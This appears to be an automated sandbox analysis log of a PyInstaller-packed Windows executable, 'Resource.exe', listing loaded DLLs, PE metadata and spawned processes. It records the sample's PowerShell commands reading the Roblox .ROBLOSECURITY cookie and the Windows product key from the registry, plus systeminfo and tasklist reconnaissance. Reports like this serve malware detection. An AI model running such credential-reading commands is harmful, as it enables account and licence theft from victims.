Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll

Source: C:\Windows\System32\tasklist.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Resource.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: Resource.exe

Static file information: File size 7714511 > 1048576

Source: Resource.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Resource.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Resource.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Resource.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Resource.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Resource.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Resource.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: Resource.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.pdbhP source: powershell.exe, 00000044.00000002.2259141089.000001B7D5905000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: Resource.exe, 00000001.00000002.2487117258.00007FF8B9F61000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Resource.exe, 00000001.00000002.2480153841.00007FF8A8290000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Resource.exe, 00000001.00000002.2486477048.00007FF8B8F71000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2485119166.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbEE source: Resource.exe, 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: Resource.exe, 00000001.00000002.2481190225.00007FF8A8642000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Resource.exe, 00000001.00000002.2486194119.00007FF8B8B3C000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: Resource.exe, Resource.exe, 00000001.00000002.2481190225.00007FF8A8642000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Resource.exe, 00000001.00000002.2486921146.00007FF8B9841000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Resource.exe, 00000001.00000002.2486194119.00007FF8B8B3C000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Resource.exe, 00000001.00000002.2486713110.00007FF8B93C1000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Resource.exe, 00000000.00000003.2015760387.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2487613545.00007FF8BFAC1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Resource.exe, 00000000.00000003.2015760387.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2487613545.00007FF8BFAC1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.pdb source: powershell.exe, 00000044.00000002.2259141089.000001B7D5905000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmp, rar.exe, 00000067.00000000.2365890239.00007FF618630000.00000002.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python311.pdb source: Resource.exe, 00000001.00000002.2483357030.00007FF8A8CCB000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2485371418.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp

Source: Resource.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Resource.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Resource.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Resource.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Resource.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline"

Source: C:\Users\user\Desktop\Resource.exe

Code function: 1_2_00007FF8A8797B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

1_2_00007FF8A8797B30

Source: Resource.exe	Static PE information: real checksum: 0x75d9e5 should be: 0x768972
Source: _ctypes.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x15efe
Source: unicodedata.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x5092b
Source: _bz2.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x13929
Source: libffi-8.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xa1d1
Source: _ssl.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x11c85
Source: sqlite3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x9c034
Source: erdw4v5g.dll.77.dr	Static PE information: real checksum: 0x0 should be: 0x35c6
Source: libcrypto-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x192b2f
Source: _queue.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0xd294
Source: _socket.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1a544
Source: python311.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x1a0ee3
Source: _decimal.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x24a43
Source: _hashlib.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x16ee9
Source: libssl-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x396d1
Source: select.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x9006
Source: _lzma.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x219f7
Source: _sqlite3.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1c9f2

Source: Resource.exe	Static PE information: section name: _RDATA
Source: libffi-8.dll.0.dr	Static PE information: section name: UPX2
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\Resource.exe	Code function: 0_2_00007FF6E60E5004 push rsp; retf	0_2_00007FF6E60E5005
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8188F28 push rsp; iretq	1_2_00007FF8A8188F29
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8185C31 push r10; ret	1_2_00007FF8A8185C33
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8187630 push rbp; retf	1_2_00007FF8A8187649
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8185CFE push rdx; ret	1_2_00007FF8A8185D01
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8185EFA push r12; ret	1_2_00007FF8A8185F07
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8188405 push r10; retf	1_2_00007FF8A8188471
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8185D06 push r12; ret	1_2_00007FF8A8185D08
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8185E0F push rsp; ret	1_2_00007FF8A8185E17
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A818930D push rsp; ret	1_2_00007FF8A818930E
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A818685F push rsi; ret	1_2_00007FF8A8186896
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8185E58 push rdi; iretd	1_2_00007FF8A8185E5A
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8188077 push r12; iretd	1_2_00007FF8A818808B
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8185F76 push r8; ret	1_2_00007FF8A8185F83
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8185F56 push r12; ret	1_2_00007FF8A8185F6E
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8187F53 push rbp; iretq	1_2_00007FF8A8187F54
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8188DA5 push rsp; retf	1_2_00007FF8A8188DA6
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8185EAD push rsp; iretd	1_2_00007FF8A8185EAE
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A818767B push r12; ret	1_2_00007FF8A81876BF
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8185CE5 push r8; ret	1_2_00007FF8A8185CEB
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8185CE0 push r10; retf	1_2_00007FF8A8185CE2
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8187FEB push r12; ret	1_2_00007FF8A8188036
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8185DF7 push r10; retf	1_2_00007FF8A8185DFA
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8185EBC push rsi; ret	1_2_00007FF8A8185EBD
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A81882C4 push rdi; iretd	1_2_00007FF8A81882C6
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A8185FB9 push r10; ret	1_2_00007FF8A8185FCC
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8A92F4541 push rcx; ret	1_2_00007FF8A92F4542
Source: C:\Users\user\Desktop\Resource.exe	Code function: 1_2_00007FF8B7E60A28 push rsp; iretd	1_2_00007FF8B7E60A29
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FF8474ED2A5 pushad ; iretd	14_2_00007FF8474ED2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FF8476000BD pushad ; iretd	14_2_00007FF8476000C1
